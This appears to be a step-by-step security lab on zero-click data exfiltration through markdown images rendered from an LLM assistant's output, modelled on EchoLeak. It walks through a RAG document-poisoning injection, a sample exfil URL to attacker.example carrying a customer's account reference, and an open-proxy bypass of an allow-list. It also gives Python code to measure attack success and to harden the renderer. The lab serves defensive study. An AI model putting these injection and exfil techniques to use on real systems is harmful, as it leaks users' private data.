Insecure Output Handling: Zero-Click Exfiltration Through Rendered Model Output (EchoLeak)
Treat the model as an untrusted source whose output flows into a sink: the chat client's markdown renderer. Prove the renderer auto-fetches, then plant a document so that a benign account question makes the assistant echo a customer's own account reference into a markdown image URL, which the renderer auto-fetches (zero-click exfiltration, the EchoLeak channel). Measure its attack-success-rate (ASR), defeat a CSP-style allow-list through a first-party open proxy, and measure that bypass too. Then harden in two moves: close the render sink so untrusted output never fires an outbound request, and add an audited host allow-list that the open proxy cannot defeat. Finally, re-run both attacks and watch ASR fall to zero.
What you'll learn
- Step 1. Recon: prove the renderer auto-fetches. You are red-teaming DV-RAG-Support, ACME Cloud's customer-support assistant. A…
- Step 2. Pixel exfil: zero-click leak through the renderer. Now turn the renderer into an exfil channel. The model is never asked to leak a…
- Step 3. Measure: attack-success-rate of the pixel exfil. One lucky exfil is a demo. A finding needs an attack-success-rate (ASR): how often…
- Step 4. CSP bypass: defeat the allow-list through a first-party open proxy. The blue team shipped a CSP-style fix: the renderer now trusts exactly one image…
- Step 5. Measure: attack-success-rate of the CSP bypass. You proved the open-proxy bypass works once. A finding needs the same treatment the…
- Step 6. Harden the sink: no outbound on untrusted output. Switch hats. You proved the direct-pixel exfil, measured it, bypassed a CSP-style…
- Step 7. Harden the allow-list: an audited host list the open proxy cannot defeat. The sink no longer fetches attacker query params, so both exploits are dead today. But…
- Step 8. Verify: re-run both attacks, ASR drops to zero. A fix you did not re-measure is a hope. You measured two attacks earlier: the…
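Steps 3, 5, and 8 all reduce to the same number: the fraction of trials in which the exfil fired. The following is a minimal sketch of an ASR harness, assuming a hypothetical `run_trial(question)` callable that asks the assistant one question, renders the answer, and returns True if the planted account reference shows up in an outbound request. The `fake_trial` function and the sample questions are placeholders so the sketch runs on its own; they are not lab data.

```python
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass
class AsrResult:
    successes: int
    trials: int

    @property
    def asr(self) -> float:
        # Attack-success-rate: fraction of trials in which the exfil fired.
        return self.successes / self.trials if self.trials else 0.0


def measure_asr(run_trial: Callable[[str], bool],
                questions: Iterable[str],
                repeats: int = 1) -> AsrResult:
    """Ask every question `repeats` times and count successful exfils."""
    successes = trials = 0
    for question in questions:
        for _ in range(repeats):
            trials += 1
            if run_trial(question):
                successes += 1
    return AsrResult(successes, trials)


if __name__ == "__main__":
    # Hypothetical stand-in for a real trial: pretend the exfil fires
    # only when the question mentions billing.
    def fake_trial(question: str) -> bool:
        return "billing" in question.lower()

    questions = [
        "Where can I find my billing account reference?",
        "How do I reset my password?",
        "Why did my billing total change this month?",
        "How do I add a teammate?",
    ]
    result = measure_asr(fake_trial, questions, repeats=5)
    print(f"ASR = {result.successes}/{result.trials} = {result.asr:.0%}")
    # prints: ASR = 10/20 = 50%
```

Repeats matter because the model's output is sampled, so the same question can succeed on one run and fail on the next. Reporting the raw counts next to the percentage keeps a small sample from looking more precise than it is.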
Prerequisites
- Comfortable reading Python
- Know what an HTTP GET and a markdown image are
- No ML background required
This is an advanced-level AI/ML lab.
What you'll do in this lab
This is a hands-on offensive-security lab about insecure output handling (OWASP Top 10 for LLM Applications, LLM05:2025, where the risk is titled Improper Output Handling). You attack DV-RAG-Support, a working Retrieval-Augmented Generation (RAG) assistant, by treating its output as somebody else's input. The chat client renders the model's answer as markdown, and a markdown image is an outbound HTTP request: the client fetches the image URL as soon as the message is displayed. You plant one help article so that a customer's ordinary account question makes the assistant echo the customer's own account reference into an image URL, and the renderer auto-fetches it. The reference leaks to the attacker's server with zero clicks, through the same channel behind EchoLeak, the Microsoft 365 Copilot exploit widely reported as the first zero-click exploit against a production LLM system.
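To see why a markdown image is a zero-click outbound request, consider a deliberately naive renderer that turns every `![alt](url)` into an `<img>` tag. A browser issues a GET for each `src` the moment the message is shown. The following is a minimal sketch, assuming a hypothetical attacker host `attacker.example` and a hypothetical account reference `ACME-ACCT-0042`, with a regex standing in for a real markdown parser. The helper names are illustrative, not the lab's code.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Inline markdown images: ![alt](url). A regex stands in for a real
# markdown parser here; it ignores titles and reference-style images.
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")
IMG_SRC_RE = re.compile(r'<img [^>]*src="([^"]*)"')


def naive_render(markdown: str) -> str:
    """Insecure sink: copies the model-controlled URL into <img src>.

    Escaping the attribute prevents tag breakout, but the browser still
    fetches whatever URL the model wrote.
    """
    return IMAGE_RE.sub(
        lambda m: f'<img alt="{html.escape(m.group(1))}" '
                  f'src="{html.escape(m.group(2))}">',
        markdown,
    )


def auto_fetched_urls(rendered_html: str) -> list[str]:
    """URLs a browser would GET as soon as the message is displayed."""
    return [html.unescape(src) for src in IMG_SRC_RE.findall(rendered_html)]


if __name__ == "__main__":
    # Hypothetical model output after retrieving the planted help article:
    # the assistant echoes the customer's account reference into an image URL.
    model_output = (
        "Your account reference is ACME-ACCT-0042.\n"
        "![status](https://attacker.example/pixel.png?ref=ACME-ACCT-0042)"
    )
    for url in auto_fetched_urls(naive_render(model_output)):
        leaked = parse_qs(urlsplit(url).query).get("ref")
        print(url, "->", leaked)
    # prints: https://attacker.example/pixel.png?ref=ACME-ACCT-0042 -> ['ACME-ACCT-0042']
```

Note that the model never "sends" anything: the leak happens entirely in the client, which is why the fix belongs at the renderer rather than in the prompt.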
You then defeat a CSP-style allow-list the way EchoLeak's authors did: by routing the exfil through a first-party open proxy that the allow-list trusts, which proves an allow-list is only as strong as its most open member. You measure how reliably each channel fires across realistic account questions, then switch hats and harden the sink: an audited egress allow-list that refuses open-proxy members, a renderer that never forwards attacker-controlled query parameters, and a safe-markdown subset that drops raw HTML and dangerous URI schemes. Re-running both attacks against the hardened sink drives both attack-success-rates to zero. The lesson is that the bug was never that the model said something bad; it was that the app passed model output to an interpreter unsanitized.
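The bypass and the fixes described above can be sketched with two checks. A host-only allow-list passes any URL on a trusted host, including that host's open-proxy endpoint, so the secret rides along inside the proxied URL. The hardened path refuses hosts whose audit flags an open proxy, rebuilds image URLs without query parameters or fragments, accepts only `https`, and escapes raw HTML to inert text. This is a minimal sketch under stated assumptions: the hosts `cdn.acme.example` and `acme.example` (with a `/proxy?url=` endpoint), the `HostAudit` record, and every helper name are hypothetical.

```python
import html
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import quote, urlsplit, urlunsplit

IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")


@dataclass(frozen=True)
class HostAudit:
    host: str
    open_proxy: bool  # does any endpoint on this host fetch arbitrary URLs?


# Hypothetical audited allow-list: every member is reviewed for open
# proxies and redirectors, and the result is recorded with the entry.
AUDITED = {
    "cdn.acme.example": HostAudit("cdn.acme.example", open_proxy=False),
    "acme.example": HostAudit("acme.example", open_proxy=True),  # /proxy?url=
}


def naive_allowed(url: str) -> bool:
    """CSP-style check: trusts the host and ignores path and query."""
    return urlsplit(url).hostname in AUDITED


def hardened_image_src(url: str) -> Optional[str]:
    """Return a safe image src for untrusted output, or None to drop it."""
    parts = urlsplit(url)
    if parts.scheme != "https":  # rejects javascript:, data:, http:, ...
        return None
    audit = AUDITED.get(parts.hostname or "")
    if audit is None or audit.open_proxy:  # unknown host, or one that forwards
        return None
    # Rebuild from the audited host and path only: no userinfo, port,
    # query parameters, or fragment from the model reaches the request.
    return urlunsplit(("https", audit.host, parts.path, "", ""))


def render_untrusted(markdown: str) -> str:
    """Safe subset: raw HTML becomes inert text; images go through the check."""
    out, pos = [], 0
    for m in IMAGE_RE.finditer(markdown):
        out.append(html.escape(markdown[pos:m.start()]))
        src = hardened_image_src(m.group(2))
        if src is not None:
            out.append(f'<img alt="{html.escape(m.group(1))}" '
                       f'src="{html.escape(src)}">')
        pos = m.end()
    out.append(html.escape(markdown[pos:]))
    return "".join(out)


if __name__ == "__main__":
    secret = "ACME-ACCT-0042"
    direct = f"https://attacker.example/p.png?ref={secret}"
    bypass = "https://acme.example/proxy?url=" + quote(direct, safe="")
    print(naive_allowed(direct), naive_allowed(bypass))  # False True
    print(hardened_image_src(direct), hardened_image_src(bypass))  # None None
    print(hardened_image_src(f"https://cdn.acme.example/logo.png?ref={secret}"))
    # https://cdn.acme.example/logo.png
```

Refusing a flagged host outright, rather than trying to filter its proxy path, keeps the rule auditable: a single forwarding endpoint on an allowed host is enough to reopen the channel. This toy renderer only emits inline images; with a real markdown library, the same check belongs wherever the library produces an image, including reference-style images.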